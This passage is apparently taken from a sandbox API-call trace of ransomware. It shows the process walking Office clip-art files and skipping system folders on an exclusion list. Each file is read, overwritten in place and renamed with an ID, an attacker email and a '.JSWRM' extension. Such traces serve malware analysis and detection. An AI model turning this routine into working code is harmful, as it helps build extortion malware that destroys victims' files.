lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.515] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.516] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090777.WMF", cAlternateFileName="")) returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2=".") returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="..") returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="...") returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="windows") returned -1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="recovery") returned -1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="perflogs") returned -1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="documents and settings") returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="system volume information") returned -1 [0079.516] lstrcmpiW (lpString1="J0090777.WMF", lpString2="msocache") returned -1 [0079.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090777.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090777.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090777.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0079.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090777.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090777.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090777.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.518] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3332) returned 1 [0079.518] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd00) returned 0x23fc98 [0079.518] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd00, lpOverlapped=0x0) returned 1 [0079.519] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.519] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd00, lpOverlapped=0x0) returned 1 [0079.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.519] CloseHandle (hObject=0x314) returned 1 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0079.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0079.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0079.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0079.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.520] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090777.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.521] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090779.WMF", cAlternateFileName="")) returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2=".") returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="..") returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="...") returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="windows") returned -1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="recovery") returned -1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="perflogs") returned -1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="documents and settings") returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="system volume information") returned -1 [0079.521] lstrcmpiW (lpString1="J0090779.WMF", lpString2="msocache") returned -1 [0079.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090779.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090779.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090779.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090779.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090779.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090779.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.522] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1456) returned 1 [0079.522] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b0) returned 0x2332c0 [0079.522] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5b0, lpOverlapped=0x0) returned 1 [0079.526] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.526] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5b0, lpOverlapped=0x0) returned 1 [0079.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0079.526] CloseHandle (hObject=0x314) returned 1 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0079.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0079.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0079.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0079.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.527] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0079.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.527] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090781.WMF", cAlternateFileName="")) returned 1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2=".") returned 1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="..") returned 1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="...") returned 1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="windows") returned -1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="recovery") returned -1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="perflogs") returned -1 [0079.527] lstrcmpiW (lpString1="J0090781.WMF", lpString2="documents and settings") returned 1 [0079.528] lstrcmpiW (lpString1="J0090781.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.528] lstrcmpiW (lpString1="J0090781.WMF", lpString2="system volume information") returned -1 [0079.528] lstrcmpiW (lpString1="J0090781.WMF", lpString2="msocache") returned -1 [0079.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090781.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090781.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090781.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090781.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090781.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090781.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.528] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5314) returned 1 [0079.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14c0) returned 0x205850 [0079.529] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0079.530] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.531] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0079.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.531] CloseHandle (hObject=0x314) returned 1 [0079.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0079.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0079.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0079.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.532] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090781.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.532] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090783.WMF", cAlternateFileName="")) returned 1 [0079.532] lstrcmpiW (lpString1="J0090783.WMF", lpString2=".") returned 1 [0079.532] lstrcmpiW (lpString1="J0090783.WMF", lpString2="..") returned 1 [0079.532] lstrcmpiW (lpString1="J0090783.WMF", lpString2="...") returned 1 [0079.532] lstrcmpiW (lpString1="J0090783.WMF", lpString2="windows") returned -1 [0079.532] lstrcmpiW (lpString1="J0090783.WMF", lpString2="recovery") returned -1 [0079.533] lstrcmpiW (lpString1="J0090783.WMF", lpString2="perflogs") returned -1 [0079.533] lstrcmpiW (lpString1="J0090783.WMF", lpString2="documents and settings") returned 1 [0079.533] lstrcmpiW (lpString1="J0090783.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.533] lstrcmpiW (lpString1="J0090783.WMF", lpString2="system volume information") returned -1 [0079.533] lstrcmpiW (lpString1="J0090783.WMF", lpString2="msocache") returned -1 [0079.533] RtlAllocateHeap 